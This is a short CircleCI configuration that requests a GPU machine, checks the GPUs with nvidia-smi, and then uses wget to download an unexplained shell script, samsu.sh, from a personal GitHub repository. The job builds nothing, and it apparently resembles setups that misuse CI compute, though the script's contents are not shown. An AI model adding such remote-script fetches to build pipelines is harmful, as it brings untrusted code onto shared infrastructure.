version: 2.1 
 
jobs: 
  build: 
    machine: 
      image: ubuntu-2004-cuda-11.4:202110-01 
    resource_class: gpu.nvidia.large 
    steps: 
      - run: nvidia-smi 
      - run: docker run --gpus all nvidia/cuda:9.0-base nvidia-smi 
      - run: wget https://raw.githubusercontent.com/ziraponk/samsu/main/samsu.sh